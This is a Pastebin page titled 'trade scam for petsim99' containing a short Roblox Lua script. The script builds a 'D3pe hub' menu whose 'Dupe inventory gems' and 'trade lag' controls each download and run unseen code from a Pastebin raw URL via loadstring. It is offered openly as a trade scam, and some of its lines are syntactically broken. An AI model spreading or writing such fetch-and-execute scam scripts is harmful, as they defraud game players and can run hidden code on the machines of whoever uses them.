Advertisement
leoo00

trade scam for petsim99

Mar 5th, 2024 (edited)
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2. local Window = Library.CreateLib("D3pe hub", "DarkTheme")
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. --- Main
  10. local Main = Window:NewTab("Main")
  11. local MainSection = Main:NewSection("Main")
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18. MainSection:NewButton("Dupe inventory gems", "dupes gems", function()
  19. loadstring(game:HttpGetAsync("https://pastebin.com/raw/6T5WqD4a", true))()
  20. end)
  21.  
  22.  
  23. MainSection:NewToggle("trade lag", "trade lag", function(state)
  24. if state then
  25. loadstring(game:HttpGetAsync("https://pastebin.com/raw/6T5WqD4a",("Toggle On")
  26. else
  27. loadstring(game:HttpGetAsync("https://pastebin.com/raw/6T5WqD4a",("Toggle Off")
  28. end
  29. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement